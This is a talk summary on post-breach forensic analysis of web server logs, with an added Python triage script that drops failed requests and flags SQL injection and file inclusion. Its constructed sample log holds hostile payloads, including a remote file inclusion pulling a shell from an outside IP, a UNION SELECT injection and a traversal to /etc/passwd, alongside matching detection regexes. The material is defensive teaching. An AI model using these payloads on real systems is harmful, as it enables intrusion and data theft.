Abstract
The video was in three parts; these are the links to those parts.
AI Generated Summary
This talk addresses the forensic analysis required after a web application breach, contrasting proactive penetration testing with reactive incident investigation. The core of the talk is a post-compromise methodology for determining what the attacker did and what on the system was affected.
Attack vectors discussed include exploiting authentication/authorization flaws and PHP file inclusion vulnerabilities to gain initial access. Once compromised, attackers commonly use SQL injection to alter backend data and inject malicious content into legitimate pages. This enables drive-by malware downloads, where user systems accessing the infected site receive payloads designed to steal credentials or establish backdoors.
For incident response, the speaker outlines a structured log analysis approach. The first step is to enumerate all network components associated with the victimized server (e.g., web server, database) and identify the log source each one produces. Given that automated attack tools generate vast log volumes, a filtering strategy is essential. The presented methodology filters out requests for non-existent files (HTTP 404s) and other unsuccessful requests, so that what remains is the traffic most likely to correspond to successful attacks. Analysts must then map specific attack patterns (e.g., SQL injection, file inclusion) to the matching blocks of log lines for detailed examination.
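The filter-then-classify step described above, as an added example that is not code from the talk or the speaker: it parses constructed Apache/nginx combined-format access log lines (not real breach data), drops the noise the talk describes (404s and other non-2xx/3xx responses), and tags what survives with the attack class it resembles. The regexes for SQL injection and remote/local file inclusion are illustrative assumptions, not a complete signature set.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access log (combined format); not taken from the talk or any real incident.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2011:14:02:11 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:14:02:19 +0000] "GET /admin/config.bak HTTP/1.1" 404 212 "-" "Nikto/2.1.5"
203.0.113.7 - - [10/Mar/2011:14:02:20 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 212 "-" "Nikto/2.1.5"
203.0.113.7 - - [10/Mar/2011:14:05:41 +0000] "GET /index.php?page=http://198.51.100.9/shell.txt HTTP/1.1" 200 778 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:14:06:02 +0000] "GET /news.php?id=1%27%20UNION%20SELECT%201,user(),3-- HTTP/1.1" 200 4020 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:14:06:30 +0000] "GET /news.php?id=1%27%20AND%201=2 HTTP/1.1" 500 540 "-" "Mozilla/5.0"
198.51.100.22 - - [10/Mar/2011:14:07:00 +0000] "POST /login.php HTTP/1.1" 401 310 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2011:14:08:15 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
"""

# Fields of the combined log format we need: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Illustrative attack signatures (assumed for this example), applied to the URL-decoded path.
PATTERNS = {
    "sqli": re.compile(r"'\s*(or|and|union)\b|union\s+(all\s+)?select|--|/\*", re.I),
    "remote_file_inclusion": re.compile(r"[?&]\w+=(https?|ftp)://", re.I),
    "local_file_inclusion": re.compile(r"\.\./|/etc/passwd|[?&]\w+=php://", re.I),
}


def parse(line):
    """Parse one access log line into a dict, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["path"] = unquote(entry["path"])  # decode %27 etc. so signatures match
    return entry


def is_noise(entry):
    """The talk's filter: non-existent files (404) and other failed requests are discarded."""
    return not (200 <= entry["status"] < 400)


def classify(entry):
    """Map a request to the attack classes whose signatures it matches (may be empty)."""
    return [name for name, rx in PATTERNS.items() if rx.search(entry["path"])]


def triage(log_text):
    """Return (flagged requests, summary counts) for a block of access log text."""
    entries = [e for e in map(parse, log_text.splitlines()) if e]
    kept = [e for e in entries if not is_noise(e)]
    hits = []
    for e in kept:
        tags = classify(e)
        if tags:
            hits.append({"ip": e["ip"], "ts": e["ts"], "path": e["path"],
                         "status": e["status"], "tags": tags})
    summary = {
        "total": len(entries),
        "kept": len(kept),
        "flagged": len(hits),
        "by_tag": Counter(t for h in hits for t in h["tags"]),
    }
    return hits, summary


if __name__ == "__main__":
    flagged, counts = triage(SAMPLE_LOG)
    print(counts)
    for h in flagged:
        print(h["ts"], h["ip"], h["status"], h["tags"], h["path"])
```

On the constructed sample, the scanner's 404s, the failed login and the SQL injection probe that produced a 500 are dropped, and three 200 responses carrying remote file inclusion, SQL injection and directory traversal payloads remain for manual review. Keep the pre-filter counts: a successful attack against a legitimate script returns 200 and looks like normal traffic until the path is inspected, and error responses such as the 500 above can themselves be evidence (error-based injection), so the discarded lines still belong in the timeline even if they are not the first thing examined.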
The practical implication is that effective post-breach analysis depends on systematic component identification and intelligent log filtering to cut through noise. This allows security teams to accurately assess the severity of the compromise, identify stolen data or persistent access, and implement targeted remediation measures to restore system integrity. The focus is on internet-based attacks against web and database servers.